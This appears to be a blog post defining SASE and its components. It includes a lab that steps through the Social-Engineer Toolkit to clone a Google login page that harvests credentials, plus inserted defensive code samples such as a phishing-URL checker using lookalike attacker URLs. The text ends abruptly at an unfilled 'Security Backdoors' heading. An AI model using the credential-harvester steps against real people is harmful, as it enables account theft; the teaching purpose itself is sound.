
SASE Definition

Organizations constantly look for ways to strengthen network security, simplify infrastructure, and improve performance. One concept that has attracted significant attention is Secure Access Service Edge (SASE). This post covers the definition of SASE, its key components, and how it changes the way businesses approach network and security architecture.

Secure Access Service Edge (SASE) is a transformative network architecture model that combines network and security services into a unified cloud-native solution. It offers a holistic approach to networking, allowing organizations to connect securely to cloud resources, applications, and data centers, regardless of their location or the devices being used.

Highlights: SASE Definition

Multiple network and security functions 

Secure Access Service Edge (SASE) is a networking and security model that combines multiple security functions into a single platform, designed to provide secure access to cloud-based applications, data, and services. A SASE architecture is built on a cloud-native platform that integrates software-defined wide-area networking (SD-WAN) with security functions such as the secure web gateway (SWG), cloud access security broker (CASB), firewall as a service (FWaaS), and zero-trust network access (ZTNA).

Traditional complex methods

SASE is becoming increasingly popular because it offers a more flexible and cost-effective approach to networking and security. The traditional approach deploys multiple devices or appliances, each with its own set of functions, which is complex, time-consuming, and expensive to manage. SASE simplifies this by integrating the necessary functions into a single platform.

SASE: A scalable approach

SASE also scales and adapts better for organizations adopting cloud-based applications and services. With SASE, organizations connect to cloud platforms such as AWS, Azure, or Google Cloud with secure access to data and applications. SASE also provides better visibility and control over network traffic, so organizations can monitor and manage their network more effectively.

Related: For additional background, you may find the following posts helpful:

  1. SD-WAN SASE
  2. SASE Solution
  3. Security Automation
  4. SASE Model
  5. Cisco Secure Firewall
  6. eBOOK on SASE



SASE Definition

Key SASE Meaning Discussion Points:


  • New phase of WAN transformation.

  • WAN challenges and how SASE solves them.

  • Challenge: Managing the network.

  • Challenge: Site connectivity.

  • Challenge: Site performance.

  • Challenge: Cloud agility.

  • Challenge: Security.

Vendor Example: Cisco Umbrella

The Power of Secure Access Service Edge (SASE)

Cisco Umbrella is one vendor implementation of the SASE idea. SASE combines network security and wide-area networking (WAN) capabilities into a single cloud-native service; by converging functions such as the secure web gateway, firewall-as-a-service, and data loss prevention, it provides a unified and simplified approach to network security. Umbrella's role in a SASE deployment is to deliver the cloud security services that the network steers traffic through.

Key Features and Benefits

Cisco Umbrella offers features including threat intelligence, advanced malware protection, a secure internet gateway, and DNS-layer security. Using machine learning and data analytics, Umbrella analyzes global internet activity to identify and block threats in real time. Its dashboard gives administrators granular visibility and control over network traffic, so they can make informed decisions and respond swiftly to potential threats.

Diagram: Cisco Umbrella. Source: Cisco.

SASE: A Cloud-Centric Approach

The meaning of SASE follows from the environment we now operate in. In a cloud-centric world, users and devices require access to services everywhere, so the focal point has changed: it is now the identity of the user and device, whereas the traditional model centered on the data center and the many network security components deployed there. These environmental changes have created a new landscape that we must both protect and connect.

Several common problems challenge this new landscape. Enterprises carry complexity and overhead from the appliances deployed for each technology stack, and legacy network and security designs add latency. In addition, most traffic is now encrypted, which a zero-trust SASE design must inspect without degrading application performance.

These are the reasons to adopt a cloud-delivered secure access service edge (SASE). SASE provides a tailored network fabric, optimized where it makes the most sense for the user, device, and application: at geographically dispersed PoPs that host the technologies that secure your environment, such as single packet authorization.

Diagram: SASE explained. Source: Fortinet.

SASE Meaning

Main SASE Definition Components

SASE – Secure Access Service Edge

  • Network as a Service (NaaS)

  • Security as a Service (SECaaS)

  • Zero-Trust Architecture

  • Cloud-Native Architecture

Components of SASE:

1. Network as a Service (NaaS): SASE integrates network services such as SD-WAN (Software-Defined Wide Area Network) and cloud connectivity to provide organizations with a flexible and scalable network infrastructure. With NaaS, businesses can optimize network performance, reduce latency, and ensure reliable connectivity across different environments.

2. Security as a Service (SECaaS): SASE incorporates various security services, including secure web gateways, firewall-as-a-service, data loss prevention, and zero-trust network access. By embedding security into the network infrastructure, SASE enables organizations to enforce consistent security policies, protect against threats, and simplify the management of security measures.

3. Zero-Trust Architecture: SASE adopts a zero-trust approach, which assumes that no user or device should be trusted by default, even within the network perimeter. By implementing continuous authentication, access controls, and micro-segmentation, SASE ensures that every user and device is verified before accessing network resources, reducing the risk of unauthorized access and data breaches.

4. Cloud-Native Architecture: SASE leverages cloud-native technologies to provide a scalable, agile, and elastic network and security infrastructure. By transitioning from legacy hardware appliances to software-defined solutions, SASE enables organizations to respond more quickly to changing business requirements, reduce costs, and improve overall efficiency.

Benefits of SASE:

1. Enhanced Security: By integrating security into the network infrastructure, SASE provides a unified and consistent security approach across all network edges, reducing potential vulnerabilities and simplifying security management.

2. Increased Agility: SASE enables organizations to adapt quickly to changing business requirements by providing on-demand network and security services that can be rapidly provisioned and scaled.

3. Improved User Experience: With SASE, users can securely access applications and resources from anywhere, on any device, without compromising performance or experiencing network congestion.

4. Cost Savings: By consolidating network and security services into a single cloud-native solution, organizations can reduce hardware and maintenance costs, streamline their infrastructure, and optimize resource utilization.

Secure Access Service Edge

SASE Advantages

Cloud Delivered: Network and Security

  • Unified and consistent security to all edges.

  • Increased agility with on-demand network and security services

  • Improved user experience. Same access from all locations.

  • Cost savings with a single cloud-native solution.

Secure Access Service Edge

SASE Technologies

Cloud Delivered: Network and Security

  • SD-WAN

  • Cloud Access Security Broker (CASB)

  • NGFW and Firewall as a service

  • Zero Trust Network Access (ZTNA)

  • Secure Web Gateway (SWG)

 

Lab Guide: Phishing Attacks

The Social-Engineer Toolkit (SET)

In this lab, we build a fake Google login page that captures the username and password a victim enters. This is phishing, and here I use the Social-Engineer Toolkit (SET), which is designed specifically to perform attacks against the human element.

Note:

SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. The attacks built into the toolkit are intended to be focused attacks against a person or organization used during a penetration test. There are a couple of steps to perform, and I'm using Kali Linux.

  1. Once the Social-Engineer Toolkit loads, select 1) Social-Engineering Attacks from the menu.
  2. Select 2) Website Attack Vectors from the next menu.
  3. Select 3) Credential Harvester Attack Method from the next menu.
  4. Select 1) Web Templates from the next menu.
  5. The next prompt asks for the IP address to which the harvested credentials are POSTed. The default IP [xx.xx.xx.xx] is correct, so press Enter here.
  6. Finally, select 2) Google as the template.

The credential harvester attack is a phishing attack where attackers create deceptive websites or emails to trick unsuspecting victims into providing their login credentials. These malicious actors often mimic legitimate websites or services, luring users into entering their usernames, passwords, or other sensitive information.

Techniques Employed by Credential Harvesters

Credential harvesters employ various techniques to make their attacks more convincing. They may use URL manipulation, where the website’s URL appears genuine, but in reality, it redirects to a fraudulent page designed to capture user credentials. Another method involves creating spoofed emails with links that lead to imitation login pages.

Consequences of Falling Victim to Credential Harvesters

The consequences of falling victim to credential harvesters can be severe. Once attackers obtain login credentials, they can gain unauthorized access to personal accounts, financial information, or corporate networks. This can result in identity theft, financial loss, reputational damage, and compromised privacy.

Analysis: 

    • This is an effortless way for attackers to use malicious links inside emails, texts, or social media messages. If those links are clicked, it directs the user to a fake login page to capture their credentials! 
    • Fortunately, there are several preventive measures individuals and organizations can take to safeguard against credential harvester attacks. Implementing robust and unique passwords, enabling two-factor authentication, and regularly updating software and security patches are effective ways to enhance security.
    • Additionally, being cautious of unsolicited emails, scrutinizing URLs before entering credentials, and educating oneself about phishing techniques can significantly reduce the risk of falling victim to such attacks.

In conclusion, the credential harvester attack method poses a significant threat to individuals and organizations. By understanding the techniques employed by attackers, being aware of the consequences, and implementing preventive measures, we can fortify our defenses against these malicious activities. Remember, staying vigilant and practicing good cybersecurity hygiene is the key to staying one step ahead of cybercriminals.
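The URL tricks described above (a brand name in front of an '@', an IP literal where a login host should be, a lookalike host) can be checked mechanically before credentials are typed or a link is delivered. The following is an added example and is not code from the original post or from SET; the expected login host and the brand keywords are assumptions for the example, and the sample URLs are constructed (the IP-literal one is what a SET harvester running on an attacker's box looks like to the victim).

```python
"""Scrutinising a login URL before entering credentials (added example)."""
import ipaddress
from urllib.parse import urlsplit

# Constructed for the example: where a genuine Google sign-in is expected to live.
EXPECTED_LOGIN_HOSTS = {"accounts.google.com"}
BRAND_KEYWORDS = ("google", "gmail")


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyze_login_url(url, expected_hosts=EXPECTED_LOGIN_HOSTS):
    """Return a list of findings; an empty list means nothing looked off."""
    findings = []
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".").lower()

    if parts.scheme != "https":
        findings.append("not-https")
    if parts.username is not None:
        # https://accounts.google.com@evil.example/ shows the brand before the
        # '@', but the browser connects to evil.example.
        findings.append("userinfo-in-url")
    if is_ip_literal(host):
        findings.append("ip-literal-host")
    if not host.isascii():
        findings.append("non-ascii-host")        # possible homoglyph lookalike
    if "xn--" in host:
        findings.append("punycode-host")
    if host not in expected_hosts:
        if any(k in host for k in BRAND_KEYWORDS):
            findings.append("brand-in-host-but-not-expected-domain")
        if any(k in parts.path.lower() for k in BRAND_KEYWORDS):
            findings.append("brand-in-path")
        findings.append(f"unexpected-host:{host}")
    return findings


if __name__ == "__main__":
    for u in ("https://accounts.google.com/signin/v2/identifier",
              "http://203.0.113.5/",                        # harvester on attacker box
              "https://accounts.google.com@evil.example/login",
              "https://accounts-google.com-login.example.net/"):
        print(u, "->", analyze_login_url(u) or ["ok"])
```

The check deliberately keys on the host the browser will actually connect to (`parts.hostname`), not on what appears first in the address bar; that is exactly the distinction the URL-manipulation technique above exploits.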

Back to Basics: SASE Definition

Generally, SASE services include SD-WAN, Zero-Trust Network Access (ZTNA), Cloud Access Security Broker (CASB), NGFW, Secure Web Gateway (SWG), unified management, and orchestration. Just what constitutes a real SASE solution varies significantly by source.

Several organizations, such as the Metro Ethernet Forum (MEF), are trying to establish neutral industry standards for SASE. These standards will pave the way for a universal understanding, the ability to integrate multiple manufacturers into a solution, and a method for teaching SASE.

Diagram: Cloud-native application security. The rise of SASE.

SASE Meaning

The rise of SASE and digital transformation

There has been a loss of confidence in the network: organizations uncover weaknesses in their networks when they roll out digital initiatives. This holds for MPLS backbones and for some SD-WAN designs, which lag in security, cloud connectivity, mobility, and site connectivity.

Confidence in SD-WAN and MPLS has decreased significantly when confronted with digital transformation. SD-WAN on its own is not an all-encompassing solution, and MPLS is rigid and fixed.

Diagram: MPLS overlay.

Organizations commonly report that they were more confident in their networks before digital transformation than after it; the impact of digital change on networks is hard to predict. Enterprises must ensure they have the right levels of infrastructure performance and security. Digital transformation is not just about replacing MPLS: networking professionals must broaden their focus to encompass security, cloud, and mobility.

Diagram: SASE definition. The drivers of digital transformation.

WAN Transformation

SASE Meaning

All these problems can be avoided by switching to SASE, a new enterprise networking technology category introduced by Gartner in 2019. SASE is the convergence of security, cloud connectivity, mobility, and site connectivity, which lets the architecture correlate otherwise disparate data points.

It is an all-in-one encompassing solution that provides a ready-made solution for the WAN transformation journey. Gartner expects at least 40% of enterprises to have explicit strategies to adopt SASE by 2024.

Today, customers are looking for a WAN transformation solution that connects and secures all edges: sites, cloud resources, mobile users, and anything else that might emerge tomorrow. MPLS is not the right approach, and some SD-WAN deployments raise question marks, whereas SASE significantly assists post-digital transformation.

So, let us shine the torch on some of the digital transformation challenges likely to surface. These challenges include complexity with management and operations, site connectivity, performance between locations, inefficient security, and cloud agility.

Diagram: SASE: combining network and security.

SASE Definition: Secure Access Service Edge (SASE)

SASE combines network security functions (such as SWG, CASB, FWaaS, and Zero Trust Network Access (ZTNA)) with SD-WAN to support organizations' dynamic, secure access needs. These capabilities are delivered primarily as a service (XaaS) and are applied based on the entity's identity, real-time context, and security/compliance policies.

SASE changes the focal point to the identity of the user and device. With traditional network design, this was the on-premises data center. The conventional enterprise network and network security architectures place the internal data center as the focal point for access.

These designs are proving ineffective and cumbersome with the rise of cloud and mobile. Traffic patterns have changed considerably, and so has the application logic.

  • A key point: “Software-defined” secure access

SASE consolidates networking and security-as-a-service capabilities into a cloud-delivered secure access service edge. The cloud-delivered service provides you with policy-based "software-defined" secure access, built on a worldwide fabric of points of presence (PoPs) and peering relationships. With the PoP design, the general architecture moves the inspection engines to the sessions rather than rerouting sessions to the engines, as traditional techniques do. This design is more aligned with today's traffic patterns and application logic.

        • SASE offers a tailorable network fabric comprising the SASE PoPs geographically dispersed.

The architecture lets you specify the performance, reliability, security, and cost of every network session, based on identity and context. For effective secure access, decisions must center on the identity of the entity at the source of the connection, not on a traditional construct such as the IP address or mere network location. The requesting entity can be a user, device, branch office, IoT device, or edge computing location, and policy is based on these parameters.
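What "policy based on identity and context, not IP address" looks like in practice is easiest to see as code. The following is an added example, not the original post's material or any vendor's product: a small policy engine of the kind a ZTNA/SASE policy layer implements. A rule is selected by who is asking (identity groups) and what they ask for (the application); the request's context (device posture, MFA) then decides the verdict. The source IP is carried only so the demo can show that it does not change the outcome. Users, groups, and applications are constructed for the example.

```python
"""Access decisions keyed on identity and context, not network location (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    user: str
    groups: frozenset
    app: str
    device_compliant: bool
    mfa: bool
    source_ip: str  # informational only; never consulted by a rule


@dataclass(frozen=True)
class Rule:
    name: str
    app: str                 # application protected, "*" for any
    groups: frozenset        # membership in any of these selects the rule
    require_compliant: bool = True
    require_mfa: bool = False

    def applies(self, req):
        """Identity + application select the rule; context does not."""
        return self.app in ("*", req.app) and bool(self.groups & req.groups)

    def conditions_met(self, req):
        """Context decides the verdict once the rule has been selected."""
        if self.require_compliant and not req.device_compliant:
            return False, "device-not-compliant"
        if self.require_mfa and not req.mfa:
            return False, "mfa-required"
        return True, "ok"


# Constructed policy: most specific rules first.
POLICY = [
    Rule("finance-erp", app="erp", groups=frozenset({"finance"}), require_mfa=True),
    Rule("wiki-read", app="wiki", groups=frozenset({"contractor", "staff"}),
         require_compliant=False),
    Rule("staff-internal", app="*", groups=frozenset({"staff"})),
]


def decide(req, policy=POLICY):
    """First matching rule wins. Failing its conditions is a deny, not a
    fall-through to a looser rule; matching nothing is an implicit deny."""
    for rule in policy:
        if rule.applies(req):
            ok, reason = rule.conditions_met(req)
            return ("allow" if ok else "deny"), f"{rule.name}:{reason}"
    return "deny", "default-deny"


if __name__ == "__main__":
    alice = dict(user="alice", groups=frozenset({"finance", "staff"}), app="erp",
                 device_compliant=True, mfa=True)
    for ip in ("203.0.113.10", "10.20.30.40"):   # coffee shop vs. office LAN
        print(ip, decide(Request(source_ip=ip, **alice)))
```

Two design points matter here. The same identity gets the same verdict from the internet and from the office LAN, which is the property the text describes. And a rule that is selected but whose context conditions fail produces a deny rather than falling through to a broader rule; otherwise the MFA requirement on the ERP rule could be sidestepped by the catch-all staff rule.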

 

Lab Guide: Identity-Aware-Proxy

Identity Security with Google Cloud

Next, we look at identity security with Google Cloud. Here, I have a minimal web application on Google App Engine, and an Identity-Aware Proxy (IAP) restricts access to it based on parameters that I configure.

Note:

  1. An identity-aware proxy (IAP) is a Google Cloud service allowing fine-grained access control to applications and resources based on user identity. By integrating with Google Cloud Identity and Access Management (IAM), IAP enables organizations to define and enforce access policies easily.
  2. IAP provides a robust solution, whether protecting sensitive data or mitigating the risk of unauthorized access.

See below; I have enabled IAP for a simple application. For access, I now need to tell the IAP service who can access the application. I do this by adding principals.

Once an app is protected with IAP, it can use the identity information that IAP provides in the request headers it passes through. The application gets the logged-in user's email address and a persistent unique user ID assigned by the Google Identity Service to that user; notice below the additional lines in the application code that read the IAP-provided identity data. IAP supplies these values in the X-Goog-Authenticated-User-Email and X-Goog-Authenticated-User-ID request headers.

Note:

If there is a risk of IAP being turned off or bypassed, your app can check to make sure the identity information it receives is valid. This uses a third web request header added by IAP called X-Goog-IAP-JWT-Assertion. The header’s value is a cryptographically signed object containing user identity data. Your application can verify the digital signature and use the data provided in this object to ensure that IAP provided it without alteration.

Digital signature verification requires several extra steps, such as retrieving the latest set of Google public keys. You can decide whether your application needs these additional steps based on the risk that someone can turn off or bypass IAP and the application’s sensitivity.
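The following is an added example of how an application behind IAP can consume that identity safely; it is not the sample application from the original post. It takes identity from the signed X-Goog-IAP-JWT-Assertion rather than trusting the plain X-Goog-Authenticated-User-* headers on their own, treats a missing assertion as a possible bypass, and cross-checks the unsigned convenience headers against the signed claims. Signature verification against Google's IAP public keys is delegated to the google-auth library in verify_with_google_auth; the offline demo injects a verifier that decodes claims without checking a signature, so the claim logic can run without network access. The project number and ID in EXPECTED_AUDIENCE are placeholders, and the header and claim formats (accounts.google.com:... prefixes, the iss value) follow Google's IAP documentation.

```python
"""Consuming IAP identity headers safely (added example)."""
import base64
import json
import time

IAP_ISSUER = "https://cloud.google.com/iap"
IAP_CERTS_URL = "https://www.gstatic.com/iap/verify/public_key"
# App Engine audience format: /projects/PROJECT_NUMBER/apps/PROJECT_ID (placeholders).
EXPECTED_AUDIENCE = "/projects/123456789012/apps/example-project"


class IapError(Exception):
    pass


def _b64url_json(segment):
    pad = "=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(segment + pad))


def verify_with_google_auth(assertion, audience=EXPECTED_AUDIENCE):
    """Production verifier: checks the ES256 signature against Google's IAP keys,
    plus audience and expiry. Requires the google-auth package and network access."""
    from google.oauth2 import id_token
    from google.auth.transport import requests
    return id_token.verify_token(assertion, requests.Request(),
                                 audience=audience, certs_url=IAP_CERTS_URL)


def iap_identity(headers, verify=verify_with_google_auth, now=None):
    """Return (email, sub) for the authenticated user, or raise IapError."""
    assertion = headers.get("X-Goog-IAP-JWT-Assertion")
    if not assertion:
        # With IAP disabled or bypassed, the plain headers could be forged by the caller.
        raise IapError("no IAP assertion; refusing to trust X-Goog-Authenticated-User-* alone")
    claims = verify(assertion)  # raises on a bad signature
    now = time.time() if now is None else now
    if claims.get("iss") != IAP_ISSUER:
        raise IapError("wrong issuer")
    if claims.get("aud") != EXPECTED_AUDIENCE:
        raise IapError("wrong audience")
    if not (claims.get("iat", 0) <= now < claims.get("exp", 0)):
        raise IapError("assertion not currently valid")
    email, sub = claims.get("email"), claims.get("sub")
    if not email or not sub:
        raise IapError("assertion lacks identity claims")
    # The unsigned headers carry "accounts.google.com:<value>"; they must agree with the JWT.
    hdr_email = headers.get("X-Goog-Authenticated-User-Email", "")
    if hdr_email and hdr_email != f"accounts.google.com:{email}":
        raise IapError("email header does not match signed assertion")
    hdr_id = headers.get("X-Goog-Authenticated-User-ID", "")
    if hdr_id and hdr_id != sub:
        raise IapError("user-id header does not match signed assertion")
    return email, sub


# --- offline demo helpers: NOT for production use ---------------------------
def make_demo_assertion(claims):
    """Build a JWT-shaped token with an EMPTY signature for the offline demo only."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'ES256', 'typ': 'JWT', 'kid': 'demo'})}.{enc(claims)}."


def demo_verify(assertion):
    """Demo verifier: decodes claims WITHOUT checking any signature."""
    return _b64url_json(assertion.split(".")[1])


if __name__ == "__main__":
    tok = make_demo_assertion({"iss": IAP_ISSUER, "aud": EXPECTED_AUDIENCE,
                               "iat": 1700000000, "exp": 1700000600,
                               "email": "alice@example.com",
                               "sub": "accounts.google.com:1111"})
    hdrs = {"X-Goog-IAP-JWT-Assertion": tok,
            "X-Goog-Authenticated-User-Email": "accounts.google.com:alice@example.com"}
    print(iap_identity(hdrs, verify=demo_verify, now=1700000100))
```

In a real deployment, call iap_identity with the default verifier; the demo verifier exists only so the claim checks can be exercised without Google's keys.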

IAP Key Features and Benefits

a) Secure Access Control: IAP offers granular control over who can access specific resources, ensuring that only authorized individuals can gain entry. By leveraging context-aware access policies, organizations can define rules based on user attributes, device security status, and more.

b) Multi-Factor Authentication (MFA): IAP supports using MFA, adding an extra layer of security to the authentication process. The risk of unauthorized access is further reduced by requiring users to provide additional verification factors such as SMS codes or security keys.

c) Centralized Logging and Auditing: IAP provides detailed logs and audit trails, allowing organizations to monitor and track access attempts. This enhances visibility and enables swift action against potential security threats.

Implementing Identity-Aware Proxy

Implementing IAP within your Google Cloud environment is a straightforward process. By following these steps, you can ensure a seamless integration:

a) Enabling IAP: Start by enabling IAP in the Google Cloud Console for the desired project. This will activate the necessary APIs and services.

b) Configuring Access Policies: Define access policies based on user identity, resource paths, and other criteria using the Cloud Console or the IAP API.

c) Fine-tuning Authentication Methods: Customize the authentication methods according to your organization's security requirements. This includes enabling MFA and deciding whether to allow or deny unauthenticated users.

Conclusion: Identity-Aware Proxy (IAP) is a robust security solution offered by Google Cloud. With its granular access control, multi-factor authentication, and centralized logging capabilities, IAP provides organizations with the means to ensure secure access to their cloud resources. By implementing IAP, businesses can enhance their security posture and protect against potential threats.

Security and Identity

With a SASE platform, when we create an object, such as a policy in the networking domain, it is then available in other domains, such as security. So, any policies assigned to users are tied to that user regardless of network location. This removes the complexity of managing network and security policies across multiple areas, users, and devices. Again, all of this can be done from one platform.

Also, when examining security solutions, many organizations buy individual appliances that each focus on one job. To troubleshoot, you need to gather information, such as the logs, from each device. A SIEM is valuable, but it is resource-heavy and so practical for only some organizations. For those without ample resources, the manual process is backbreaking, and there will be false positives.

Diagram: SASE security. The PoP architecture.

SASE Definition with Challenge 1: Managing the Network

Looking across the entire networking and security industry, everyone sells individual point solutions that are not a holistic joined-up offering. Thinking only about MPLS replacement leads to incremental, point solution acquisitions when confronted by digital initiatives, making their networks more complex and costly.

Principally, distributed appliances for network and security at every location require additional tasks such as installation, ongoing management, regular updates, and refreshes. This results in far too many security and network configuration points. We see this all the time with NOC and SOC integration efforts.

Numerous integration points

The point-solution approach addresses one issue and requires a considerable amount of integration. Therefore, you must constantly add solutions to the stack, likely resulting in management overhead and increased complexity. Let’s say you are searching for a new car. Would you prefer to build the car with all the different parts or buy the already-built one?

In the same way, the network and security industry is presently geared up to deliver its offering in parts. It is your job to support, manage, and build the stack over time and scale it when needed. Fundamentally, you need to be an expert in all the different parts.

However, if you abstract the complexity into one platform, you don’t need to be an expert in everything. SASE is one of the effective ways to abstract management and operational complexity.

SASE Meaning: How SASE solves this

Converging network and security into a single platform removes the need for multiple integration points, eliminating the point solutions and the complexity of managing each. With SASE, the functionality of each point solution is brought together under one hood, the SASE cloud, which merges the networking and security capabilities into a single platform.

This way, you now have a holistic joined-up offering. Customers don’t need to perform upgrades, size, and scale their network. Instead, all this is done for them in the SASE cloud, creating a fully managed and self-healing architecture.

If something goes wrong in one of the SASE PoPs, traffic converges to another PoP with minimal disruption. All of this is automatic: there is no need to set up new tunnels or have administrators step in to perform configurations.

Diagram: SASE definition. No more point solutions.

SASE Definition with Challenge 2: Site Connectivity

SD-WAN appliances require other solutions for global connectivity and to connect, secure, and manage mobile users and cloud resources. As a result, many users are turning to Service Providers to handle the integration. The carrier-managed SD-WAN providers integrate a mix of SD-WAN and security devices to form SD-WAN services.

Unfortunately, this often makes the Service Providers inflexible in accommodating new requests. The telco’s lack of agility and high bandwidth costs will remain problematic. Deploying new locations has been the biggest telco-related frustration, especially when connecting offices outside of the telco’s operating region to the company’s MPLS network. For this, they need to integrate with other telcos.

Video: SD-WAN

In the following video, we will address the basics of SD-WAN and the challenges of the existing WAN. We will also go through popular features of SD-WAN and integration points with, for example, SASE.


SASE Meaning: How SASE solves this

SASE handles all of the complexities of management. As a result, the administrative overhead for managing and operating a global network that supports site-to-site connectivity and enhanced security, cloud, and mobility is kept to an absolute minimum.

SASE Definition with Challenge 3: Performance Between Locations

The throughput is primarily determined by latency and packet loss, not bandwidth. Therefore, for an optimal experience for global applications, we must explore ways to manage the latency and packet loss end-to-end for last-mile and middle-mile segments. Most SD-WAN vendors don’t control these segments, affecting application performance and service agility.

Consequently, there will be constant tweaking at the remote ends to attain the best performance for your application. With SD-WAN, we can bundle transports and perform link bonding to solve the last mile. However, this does not create any benefits for the middle mile bandwidth.

MPLS will help you overcome the middle-mile problems, but you will likely pay a high price.

Diagram: Define SASE. Link bonding is only suitable for last-mile performance.

SASE Meaning: How SASE solves this

The SASE cloud already has an optimized, converged network and security platform, so sites need only connect to the nearest SASE PoP. The sites are then placed on the global private backbone and benefit from global route optimization, dynamic path selection, traffic optimization, and end-to-end encryption. Traffic can also be routed over MPLS, directly between sites (not through the SASE PoP), or over IPsec tunnels to third-party devices. The SASE architecture optimizes both last-mile and middle-mile traffic flows.

Optimization techniques

The SASE global backbone has several techniques that improve the network performance, resulting in predictable, consistent latency and packet loss. The SASE cloud has complete control of each PoP and can employ optimizations. It uses proprietary routing algorithms that factor in latency, packet loss, and jitter.

These routing algorithms favor performance over cost and select the optimal route for every network packet. This contrasts with Internet routing, whose metrics do not consider what is best for the application or the traffic type.
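Two claims above are worth making concrete: that throughput is governed by latency and loss rather than bandwidth, and that a backbone choosing paths on latency, loss, and jitter picks different routes than hop-count or BGP-style metrics. The following is an added example, not from the original post or any SASE vendor's implementation. It models a small PoP backbone as a graph whose links carry constructed RTT, loss, and jitter measurements, estimates steady-state TCP throughput per path with the Mathis approximation (MSS / (RTT * sqrt(p))), and compares a hop-count shortest path with a performance-metric path over the same graph. The PoP names, link measurements, and metric weights are all constructed.

```python
"""Loss- and latency-aware path selection on a toy PoP backbone (added example)."""
import heapq
import math

# Constructed link measurements: (rtt_ms, loss_fraction, jitter_ms), symmetric links.
LINKS = {
    ("LON", "NYC"): (70.0, 0.001, 2.0),
    ("NYC", "SFO"): (65.0, 0.002, 3.0),
    ("LON", "FRA"): (15.0, 0.0002, 0.5),
    ("FRA", "NYC"): (80.0, 0.0002, 1.0),
    ("LON", "SFO"): (150.0, 0.03, 20.0),   # one hop, but a lossy transit path
}


def build_graph(links):
    g = {}
    for (a, b), m in links.items():
        g.setdefault(a, {})[b] = m
        g.setdefault(b, {})[a] = m
    return g


def mathis_throughput_mbps(rtt_ms, loss, mss_bytes=1460):
    """Mathis et al. steady-state TCP estimate: MSS / (RTT * sqrt(p)), in Mbit/s."""
    rtt_s = rtt_ms / 1000.0
    return mss_bytes * 8 / (rtt_s * math.sqrt(loss)) / 1e6


def hop_count(_metric):
    """Hop-count weight: every link costs the same."""
    return 1.0


def performance_cost(metric, loss_weight=2000.0, jitter_weight=1.0):
    """Composite weight: RTT plus penalties for loss and jitter (weights are assumptions)."""
    rtt, loss, jitter = metric
    return rtt + loss_weight * loss + jitter_weight * jitter


def shortest_path(graph, src, dst, cost):
    """Dijkstra over link metrics; `cost(metric)` maps a link to its weight."""
    dist, prev, heap = {src: 0.0}, {}, [(0.0, src)]
    while heap:
        d, u = heapq.heappop(heap)
        if u == dst:
            break
        if d > dist.get(u, float("inf")):
            continue
        for v, m in graph[u].items():
            nd = d + cost(m)
            if nd < dist.get(v, float("inf")):
                dist[v], prev[v] = nd, u
                heapq.heappush(heap, (nd, v))
    path = [dst]
    while path[-1] != src:
        path.append(prev[path[-1]])
    return path[::-1]


def path_metrics(graph, path):
    """End-to-end RTT (sum), loss (1 - prod(1 - p)) and jitter (sum) along a path."""
    rtt = jitter = 0.0
    survive = 1.0
    for a, b in zip(path, path[1:]):
        r, p, j = graph[a][b]
        rtt += r
        jitter += j
        survive *= (1 - p)
    return rtt, 1 - survive, jitter


def path_throughput_mbps(graph, path):
    rtt, loss, _ = path_metrics(graph, path)
    return mathis_throughput_mbps(rtt, loss)


if __name__ == "__main__":
    g = build_graph(LINKS)
    for label, cost in (("hop-count", hop_count), ("performance", performance_cost)):
        p = shortest_path(g, "LON", "SFO", cost)
        print(f"{label:12s} {'->'.join(p):18s} rtt/loss/jitter={path_metrics(g, p)} "
              f"est. TCP={path_throughput_mbps(g, p):.2f} Mbit/s")
```

On this constructed graph the hop-count route is the single direct LON-SFO link, while the performance metric detours via NYC: two hops, less RTT, and roughly 3.5 times the estimated TCP throughput because the direct link's 3% loss dominates the Mathis term. The weights in performance_cost are arbitrary; the point is that loss and jitter enter the decision at all, which Internet routing metrics do not do.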

SASE Definition with Challenge 4: Cloud Agility

Cloud applications are becoming the most critical to organizations, even more critical than those hosted in private data centers. When delivering cloud resources, we must consider more than just providing connectivity. In the past, when we spoke about agility, we were concerned only with adding new on-premises sites.

Now, however, this conversation needs to encompass the cloud. Delivering cloud applications is primarily about providing an application experience as responsive as that of on-premises applications. However, most SD-WANs are slow to extend to newly provisioned public cloud infrastructure, and MPLS is expensive, rigid, and not built for cloud access.

SASE Meaning: How SASE solves this

Cloud Native Meaning

SASE natively supports cloud data centers (IaaS) and applications (SaaS) without additional configuration, complexity, or point solutions, enabling built-in cloud connectivity. This further enables the rapid delivery of new public cloud infrastructure.

The SASE PoPs are colocated in data centers directly connected to the IXPs of the leading IaaS providers, such as Amazon AWS, Microsoft Azure, and Google Cloud Platform. In addition, cloud applications are optimized through SASE's ability to define the egress points, so cloud application traffic exits at the point closest to the customer's application instance.

The optimal global routing algorithms can determine the best path from anywhere to the customer’s cloud application instance. This provides optimal performance to the cloud applications regardless of the user’s location.

So, when we talk about performance to the cloud with SASE, the latency to the cloud is comparable to the optimized access provided by the cloud providers themselves, such as AWS Direct Connect or Azure ExpressRoute. In that sense, SASE provides cloud performance out of the box.

SASE Definition with Challenge 5: Security

The security landscape is constantly evolving, so network security solutions must evolve with it. Ransomware and malware will continue to be the primary security concerns from 2020 onward. Combating them is a challenge for the entire organization when the defenses consist of various solutions with complex integration points scattered through the network domain.

Security must be a part of any WAN transformation initiative protecting the users and resources regardless of the underlying network managed through a single-pane-of-glass.

However, a bundle of non-integrated security products results in appliance sprawl that hinders your security posture instead of strengthening it. The security solution must defend against emerging threats like malware/ransomware. In addition, it must boost the ability to enforce corporate security policies on mobile users.

Finally, the security solution must also address the increasing cost of buying and managing security appliances and software.

Diagram: SASE edge. The issues of service chaining.

Security and encryption

So, we know there is an increase in complexity due to the disparate tools required to address the different threat vectors. For example, DLP functionality may be spread across the SWG, the CASB, and a standalone DLP product, each managed by a different team. What about the impact of encrypted web traffic on the security infrastructure?

The issue is that most internet traffic is now encrypted, and attackers deliver payloads, issue command and control instructions, and exfiltrate data over encrypted protocols. Organizations cannot decrypt all network traffic, both for performance reasons and to avoid inspecting sensitive employee information.

Also, there are issues with the scalability of encrypted traffic management solutions. This can, too, cause performance issues.

Lab Guide: Security Backdoors

Using Bash

